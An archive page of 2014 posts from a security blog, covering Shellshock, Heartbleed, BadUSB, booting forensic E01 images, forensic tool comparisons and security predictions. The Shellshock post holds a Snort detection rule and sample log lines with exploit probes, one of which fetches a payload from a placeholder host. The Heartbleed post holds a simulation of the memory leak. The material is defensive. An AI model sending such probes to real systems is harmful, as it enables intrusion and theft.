Wednesday, November 12, 2014

Not only that. We are all better together

I just read an article published by Dark Reading, "Better Together: Why Cyber Security Vendors Are Teaming Up".

I have always believed that one cannot fight cybercrime alone.

Cybercrime is organized crime. We all know that organized crime has gone "cyber" for quite some time. They evolve. We must too.

If the bad guys can team up to launch a cyber attack, and the vendors are teaming up too, then why can't we, the cyber security representatives of our companies, team up to defend ourselves? Start by sharing information, intel and experiences in mitigating attacks.

If some of us are worried about disclosing "weaknesses" to competitors, then start with a closed group, for example amongst the "Top 10 public listed companies" in XXX country. Of course, in the first few meetings no one will share very detailed information, but over time, once trust has been built amongst the members, more information and details will flow.

Most of us security folks are trained to be skeptical and careful about trusting people, but when it comes to countering cybercrime, I don't think we have much choice. We have to learn to trust, to give and take.

Sunday, September 28, 2014

Bashing the Big Bad Bash "shellshock"

Updated 29/9/2014: updated video from SANS.

How bad is it? Very.

What happened? Check out the SANS video below:

As of today (28 Sep 2014), the available patch is not adequate: it fixes only the first problem (CVE-2014-6271) but not the second (CVE-2014-7169). Vendors are still working on fixes for CVE-2014-7169 and four other newly discovered bugs.

Also, the folks at FireEye have written a very good piece about this, with sample attack vectors and exploits included. Check out their blog post titled "Shellshock in the wild".

Now, I'm sure by now you have been asked the million dollar question by your boss or some senior manager:
Are we vulnerable? Can you find out quickly?
Quick is the keyword. You should first check your exposure from the internet.

But how? Ask Google. Look for indications that bash scripts are exposed on your website, for example:

filetype:sh OR filetype:bash

If you see URLs with .sh or .bash extensions, be paranoid. Check those first and disable them. Replace the scripts with something else, e.g. Perl or Python. Bear in mind that the extension is only a hint: any CGI script, Perl and Python included, is exposed if it spawns a shell (system(), backticks, popen()) on a system where /bin/sh is bash, because the web server hands attacker-controlled headers such as User-Agent to the script as environment variables. Also check the web server's own cgi-bin directories, since Google only knows what it has crawled.

Next, you may want to add a custom signature to your NIPS to detect/stop potential exploits. Here is a quick Snort signature (taken from Volexity's website):

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Volex - Possible CVE-2014-6271 bash Vulnerability Requested (header)"; flow:established,to_server; content:"() {"; http_header; threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;)

Or grab the official Snort rules from the Snort website.
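The two questions above, "is our bash vulnerable?" and "are we being probed?", can both be answered with a few lines of code. The script below is an added example, not from the original post nor from SANS, FireEye or Volexity: the first two functions run the public test strings for CVE-2014-6271 and CVE-2014-7169 against the local bash binary, and the third applies the Snort rule's content match ("() {") to web-server access-log lines. The log lines are constructed for this example (the 203.0.113.x and 198.51.100.x addresses are documentation ranges).

```python
"""Shellshock checks: local bash test plus the Snort rule's match applied to logs.

Added example, not from the original post. Needs Python 3.7+ (capture_output).
"""
import os
import re
import subprocess
import tempfile

def check_cve_2014_6271(bash="bash"):
    """True if bash runs the code that follows a function definition exported
    through the environment (CVE-2014-6271), False if patched, None if no bash."""
    env = dict(os.environ, x="() { :;}; echo vulnerable")
    try:
        out = subprocess.run([bash, "-c", "echo this is a test"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except FileNotFoundError:
        return None
    return "vulnerable" in out

def check_cve_2014_7169(bash="bash"):
    """True if only the incomplete first fix is present (CVE-2014-7169).
    On such a bash the parser leaks a trailing '>' into the next command, so
    `bash -c "echo date"` writes the output of `date` to a file named 'echo'."""
    env = dict(os.environ, X="() { (a)=>\\")
    with tempfile.TemporaryDirectory() as cwd:
        try:
            subprocess.run([bash, "-c", "echo date"], env=env, cwd=cwd,
                           capture_output=True, text=True, timeout=10)
        except FileNotFoundError:
            return None
        return os.path.exists(os.path.join(cwd, "echo"))

# Exactly the Snort content match above. Vulnerable bash only imports a
# function when the variable starts with the four characters "() {", so a
# probe without that prefix cannot trigger the bug anyway.
PROBE = re.compile(r"\(\) \{")

def find_shellshock_probes(log_lines):
    """(line number, snippet) for every access-log line carrying a function
    definition in the request, referer or user-agent field."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = PROBE.search(line)
        if m:
            hits.append((n, line[m.start():m.start() + 60]))
    return hits

SAMPLE_LOG = [  # constructed Apache combined-format lines
    '203.0.113.7 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://203.0.113.9/x -O /tmp/x\\""',
    '198.51.100.4 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36"',
    '203.0.113.7 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 '
    '"() { ignored;}; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.30"',
]

if __name__ == "__main__":
    print("CVE-2014-6271 vulnerable:", check_cve_2014_6271())
    print("CVE-2014-7169 vulnerable:", check_cve_2014_7169())
    for n, snippet in find_shellshock_probes(SAMPLE_LOG):
        print(f"line {n}: {snippet!r}")
```

Run the local checks on every box that serves CGI, not just the ones Google found; the log scan is the cheap way to find out whether anyone has already tried, since the probe lands in the access log whether or not the script was vulnerable.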

Information security folks: if you play this game well, it could be another good business case for pushing to get those legacy systems updated/upgraded!

Friday, August 8, 2014

BadUSB in the enterprise. Why you should not panic over it.

Hot topic of the past 2-3 weeks: BadUSB. Until yesterday, most talks and write-ups were just speculation, as no details had been released.

The researchers released more details during their Black Hat 2014 presentation yesterday. You may grab the slides from their website.

As the CISO or information security professional responsible for security within your organisation, you have every right to be worried. The good news is that you can stop the panic now, if...

You don't give your users admin rights.
To attack a target machine successfully, the attacker must have or gain access to a machine on which a user with admin privileges is logged in.

I find that WIBU Systems' alert explains it very well. Here is the excerpt:

"A BadUSB attack can be successfully accomplished only with logged-in users who have administrator privileges to their computer. In principle, the attack would also work for OS X and Linux; only the actual commands from the “keyboard” would be different."

Nowadays, most enterprise laptops/PCs are hardened and you rarely see users with admin rights anymore. Of course, there are exceptions (really? If you are the CISO, shame on you!).

Of course, there are still risks. But I would say the risk is low, if you have done the right things. Keep in mind that a device posing as a keyboard runs with whatever rights the logged-in user has, so least privilege limits the damage rather than eliminating it.

Friday, June 27, 2014

Booting up an evidence E01 image using free tools (FTK Imager & VirtualBox)

Being able to boot an acquired evidence image (hard drive) is always helpful for forensics and investigation. If you do a Google search, you will find that most methods and discussions refer to VMware Workstation. As VMware Workstation is not free, that is not good news if you are on a low budget or do not have a licence at all.

Don't worry... I will show you how you can boot an acquired E01 image using freely available tools.

What you will need:
1. FTK Imager
2. VirtualBox and the VirtualBox Extension Pack
3. Admin rights (don't have them? You're joking, right???)

I'm not going to detail how to install FTK Imager and VirtualBox... those are really easy.

Here are the steps:
1. Open FTK Imager. Go to File -> Image Mounting.

2. Select the E01 image you want to mount:
a) Mount Type: Physical Only
b) Mount Method: Block Device / Writable (I know what you are thinking... do not worry about tampering with the evidence file. FTK Imager creates a cache file that temporarily stores all the "changes" you make; the E01 itself stays untouched.)
c) Write Cache Folder: take the default or point it to any folder that makes you happy :)

3. Click "Mount". You will see which physical drive the image is mapped to; note the drive number, you need it in step 5.

4. Create a new folder for storing the virtual disk file later, e.g. c:\temp\
5. Open a command prompt as administrator. Go to c:\Program Files\Oracle\VirtualBox and run the following command: vboxmanage internalcommands createrawvmdk -filename c:\temp\securityisfun.vmdk -rawdisk \\.\physicaldrive5

NOTE: Replace the path, the file name to be created and the physical drive number accordingly (use the drive number FTK Imager reported in step 3).

6. Run VirtualBox as administrator. Create a new virtual machine matching the OS of the image, e.g. Windows XP or Windows 7.
a) RAM: set it to any amount you like. I normally set it to 2GB.
b) Hard Drive: point it to the virtual disk file you just created in step 5 above.

7. Start the virtual machine. It should run now.

8. In case you get a blue screen, which is not uncommon, try changing the HDD controller type, which is IDE by default, to SATA, SCSI or SAS. You can change this by editing the settings of the virtual machine:
a) Delete the existing HDD controller.
b) Add a new controller, e.g. SATA.
c) Add a new disk. Select "Choose an existing disk" and point it to the virtual disk file you created (e.g. securityisfun.vmdk).

9. If you still get the blue screen, Windows most likely cannot see the drive because the driver for the chosen controller is not loaded at boot (typically STOP 0x7B, INACCESSIBLE_BOOT_DEVICE). Try the following steps, which involve editing the registry of the image to enable the SCSI and SAS drivers at boot:
a) Unmount the image you mounted with FTK Imager.
b) Mount the same image with FTK Imager again, now with the options:
Mount Type: Physical & Logical
Drive Letter: take the default
Mount Method: Block Device / Writable
c) You should see that the partitions of the image are now mounted and accessible.
d) Run "regedit.exe" as administrator.
e) Select "HKEY_LOCAL_MACHINE" (Load Hive is only enabled when this or HKEY_USERS is selected).
f) Select "File, Load Hive". Point it to the SYSTEM hive of the Windows partition of your mounted image. For example, if the image's Windows partition is mounted by FTK Imager as K:, point it to K:\Windows\system32\config\SYSTEM
g) Enter any name when prompted (sorry, a bit of marketing here :) ). You should now see an additional registry key with the name you typed.
h) Navigate to <the name you typed>\ControlSet001\Services. (ControlSet001 is normally the set that boots; if in doubt, check the "Current" value under <the name you typed>\Select in the same hive.)
i) Look for "LSI_SCSI". Click on it and set the "Start" value to 0 (zero). A value of 0 means Windows will load this driver at boot time. Repeat the same for "LSI_SAS" and "LSI_SAS2". (If you picked a SATA controller for a Windows 7 image, do the same for "msahci".)
j) Select the hive you loaded (the key with the name you typed) and choose "File, Unload Hive". Click "Yes". Close regedit.
k) Now try to boot your virtual machine again. Try different controllers, e.g. SAS, SATA, SCSI, if you are still getting the blue screen.

10. If you are still getting the blue screen despite all of this... two words for you: bad luck! At the moment I don't have any other solutions or workarounds. I will update this blog post if I (ever) come across something new :)
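The command-line half of the procedure (the VBoxManage call and the registry edits) can be made repeatable. The script below is an added example, not from the original post: it builds the VBoxManage command that maps the FTK-mounted physical drive to a raw VMDK, and uses reg.exe, which offers the same load/add/unload hive operations as regedit, to set Start=0 for the storage driver services in the image's offline SYSTEM hive. The drive number 5, the K:\Windows\System32\config\SYSTEM path and the hive key name "evidence" are assumptions to adapt to your mount; run it from an elevated prompt on Windows, or with --dry-run anywhere to only print the commands.

```python
"""Command-line half of the E01 boot procedure, made repeatable.

Added example, not from the original post. Drive number, hive path and the
hive key name "evidence" are assumptions; change them to match your mount.
"""
import os
import subprocess
import sys

VBOXMANAGE = r"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe"
SERVICE_BOOT_START = 0                                    # Start=0: loaded by the boot loader
STORAGE_SERVICES = ("LSI_SCSI", "LSI_SAS", "LSI_SAS2")    # add "msahci" for SATA on Windows 7

def createrawvmdk_cmd(vmdk_path, physical_drive):
    r"""VBoxManage internalcommands createrawvmdk pointing at \\.\PhysicalDriveN."""
    return [VBOXMANAGE, "internalcommands", "createrawvmdk",
            "-filename", vmdk_path,
            "-rawdisk", r"\\.\PhysicalDrive%d" % physical_drive]

def hive_load_cmd(system_hive, key_name="evidence"):
    """Same as regedit's File, Load Hive: mounts the offline hive under HKLM\\<name>."""
    return ["reg", "load", r"HKLM\%s" % key_name, system_hive]

def hive_unload_cmd(key_name="evidence"):
    """Same as regedit's File, Unload Hive."""
    return ["reg", "unload", r"HKLM\%s" % key_name]

def boot_start_cmds(key_name="evidence", control_set="ControlSet001",
                    services=STORAGE_SERVICES):
    """One 'reg add ... /v Start /t REG_DWORD /d 0 /f' per storage driver service."""
    return [["reg", "add",
             r"HKLM\%s\%s\Services\%s" % (key_name, control_set, svc),
             "/v", "Start", "/t", "REG_DWORD", "/d", str(SERVICE_BOOT_START), "/f"]
            for svc in services]

def run(cmd, dry_run):
    """Print the command; execute it unless dry_run (raises on non-zero exit)."""
    print(" ".join(cmd))
    if not dry_run:
        subprocess.run(cmd, check=True)

def apply_hive_edits(system_hive, dry_run, key_name="evidence"):
    """Load the offline hive, set the drivers to boot-start, and always unload
    again: a hive left loaded keeps the mounted image busy and FTK cannot unmount it."""
    if not dry_run and not os.path.isfile(system_hive):
        raise FileNotFoundError(system_hive)
    run(hive_load_cmd(system_hive, key_name), dry_run)
    try:
        for cmd in boot_start_cmds(key_name):
            run(cmd, dry_run)
    finally:
        run(hive_unload_cmd(key_name), dry_run)

if __name__ == "__main__":
    dry = "--dry-run" in sys.argv
    run(createrawvmdk_cmd(r"C:\temp\securityisfun.vmdk", 5), dry)   # step 5
    apply_hive_edits(r"K:\Windows\System32\config\SYSTEM", dry)     # step 9
```

The writes go to FTK Imager's write cache, exactly as the regedit edits do, so the E01 is never modified; the try/finally matters because an exception between load and unload would otherwise leave the hive pinned.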

Have fun!

Tuesday, June 3, 2014

HiTB Haxpo AMS 2014 - My takeaway

Yup. That's my crew T-shirt from Hack in the Box Amsterdam 2014, now known as Haxpo. It was nice and fun meeting all the .MY and .NL folks again.

I have to admit, I feel the conference topics presented were not as exciting as last year's. However, the Haxpo (the part you can enter for free) was quite a success.

Nevertheless, a couple of interesting talks caught my attention:

1. Cool idea: splitting a Java exploit into multiple innocent-looking Java applets in order to avoid detection. Check out "Reloading Java Exploits: Long Live Old JRE!" by renowned security researcher (read: hacker) Luigi Auriemma.

2. Wanna fly for free? Check out "Exploiting Passbook to Fly for Free" by Anthony Hariton. This was the funniest presentation I saw this year, full of fun and laughs. NOTE: he neither confirmed nor denied whether he actually performed the "test" personally :)

See y'all again next year folks!

Friday, April 11, 2014

Heartbleed - A picture that tells a thousand words

20140414 Update #2:
The server's private key can be obtained. This is confirmed. See here.

Update #1:
Apparently the NSA KNEW about this for years. Surprised? Not really...

Well explained. Picture taken from xkcd -

How bad is Heartbleed? Very bad. It affects not only HTTPS but every application, server, router and firewall that uses a vulnerable OpenSSL (1.0.1 through 1.0.1f with the TLS heartbeat extension enabled; 1.0.1g fixes it).

We have heard all the bad news. But there is a little good news: retrieving private keys may not be that easy. This post explains it all (see Update #2 above, though: it has since been confirmed to be possible). However, getting passwords is still easy if you are lucky (well, try a few times). There are a few websites you can use to check whether a site is vulnerable, but they don't give you the memory dump. Here is the Python script that gives you the dump.
Tip: run it in debug mode.
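What the xkcd strip shows in pictures, as an added example (not the dump script referred to above, and not OpenSSL's code): a miniature of the TLS heartbeat handler with the bounds check that OpenSSL 1.0.1 through 1.0.1f lacked, beside the check that 1.0.1g added. The "neighbouring memory" is a constructed byte string standing in for whatever sits after the record in the real heap, and the message layout follows RFC 6520 (type, 16-bit payload length, payload, padding).

```python
"""Heartbleed in miniature: trusted payload_length versus the 1.0.1g check.

Added example, not OpenSSL code. NEIGHBOUR_MEMORY is constructed.
"""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING = 16                      # RFC 6520: at least 16 bytes of padding

def build_heartbeat(payload, claimed_length=None):
    """Heartbeat body: type(1) | payload_length(2) | payload | padding.
    claimed_length lets the sender lie about the length, as the attack does."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING

def heartbeat_vulnerable(record, memory_after_record):
    """Pre-1.0.1g behaviour: take payload_length from the wire and memcpy that
    many bytes from the payload, running past the record into adjacent memory."""
    hbtype, payload_length = struct.unpack("!BH", record[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return None
    heap = record + memory_after_record            # what the process really holds
    echoed = heap[3:3 + payload_length]             # no comparison with len(record)
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed

def heartbeat_fixed(record, memory_after_record):
    """1.0.1g: discard the request if 1 + 2 + payload_length + 16 exceeds the
    record length, so the copy can never leave the record."""
    if len(record) < 3:
        return None
    hbtype, payload_length = struct.unpack("!BH", record[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_length + PADDING > len(record):
        return None                                 # silently dropped, as the fix does
    echoed = record[3:3 + payload_length]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed

def leaked_bytes(response, sent_payload):
    """Whatever the responder echoed beyond the bytes the client actually sent."""
    if response is None:
        return b""
    return response[3 + len(sent_payload):]

# Constructed stand-in for the heap contents following the record.
NEIGHBOUR_MEMORY = (b"\x00" * 8
                    + b"user=alice&password=hunter2\r\nCookie: session=4f3c"
                    + b"\x00" * 16)

if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    malicious = build_heartbeat(b"ping", claimed_length=64)
    print("honest, vulnerable  :", heartbeat_vulnerable(honest, NEIGHBOUR_MEMORY))
    print("lying, vulnerable   :", leaked_bytes(heartbeat_vulnerable(malicious, NEIGHBOUR_MEMORY), b"ping"))
    print("lying, fixed        :", heartbeat_fixed(malicious, NEIGHBOUR_MEMORY))
```

The real attack claims 0xFFFF bytes per request and simply repeats, which is why the dumps are noisy but eventually contain session cookies, passwords and, as Update #2 confirms, key material; the fixed handler's silent drop is also why a vulnerability scanner must distinguish "no reply" from "reply longer than what was sent".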

Thursday, February 20, 2014

EnCase vs Autopsy vs X-Ways

Over the past few months, I have had the chance to work more extensively with the following IT forensic tools (at the same time):

1. EnCase Examiner
2. XWF or X-Ways Forensics
3. Autopsy

Most IT forensic professionals would say that no single tool fits everything. I couldn't agree more.

Here are my personal views of each tool's pros and cons:

1. EnCase:

Pros:
- Easy-to-use user interface.
- Renowned tool, accepted by courts of law.
- Easy reporting features.
- Easy and free acquisition tool (EnCase Imager).
- Built-in support for BitLocker.
- Nice and user-friendly "Review Package" that can be sent to the requestor for reviewing the evidence.

Cons:
- Not cheap.
- Evidence processing can be slow, especially when processing large PST files.
- Not portable by default.

2. XWF (X-Ways):

Pros:
- Very customizable evidence processing options. You can select to process only the things you want to look at, e.g. emails or the registry.
- Very flexible and granular filtering options. Filter on column 1 + filter on column 2, etc.
- Highly customizable search functions. For example, search for "xyz" only in Word documents.
- Multiple instances, e.g. one doing processing while the other does live preview.
- Portable by default.
- Very frequent updates with new features.

Cons:
- Complex interface. Technical in nature; not easy for a beginner to learn.
- Too many options to choose from, which can be confusing. (However, the default options are good enough for most cases.)
- Dongle must be attached at all times to start the software.
- No option to create a nice "Review Package" that you can forward to someone.
- No support for BitLocker (the company I work for uses it a lot).

3. Autopsy:

Pros:
- Free, including for commercial use.
- Very fast and easy tool for analysing a user's browsing history or internet activity.

Cons:
- Limited functionality (but it is free!).
- No support for BitLocker.
- No nice "Review Package".

So it really depends on what you want to do. For example, if I want to quickly find out how malware infected a machine, I would use Autopsy first. If I have to process evidence for a fraud case, I would go for EnCase first. X-Ways is the tool when I need complex filtering and fast extraction of specific evidence.

Have fun!

Saturday, January 18, 2014

What's coming in 2014?

What's coming to information security world in 2014?

These are my views:
1. Malware will be for profit, no longer for fun. It will be harder to track who is behind it.
2. Cryptolocker and the like will go mainstream.
3. Demand for digital/IT forensics will go up.
4. More providers will enhance their service offerings with encryption in response to the NSA's spying activities.
5. Companies and government organisations will collaborate more to fight cybercrime. More joint announcements will be made on successful take-downs of botnets and cybercrime networks.
6. Windows XP end of life will have a high impact and directly contribute to higher botnet activity. The bad guys are holding their cards now, waiting for the right time to swallow their prey once XP is left orphaned.
7. More malware will target Android devices. I won't be surprised if Cryptolocker invades Android soon (if it hasn't already).
8. Data breaches will continue to rise. We will see more data breaches at big retail and other non-IT services companies.
9. Big Data will be one of the hot topics discussed.

What's yours?
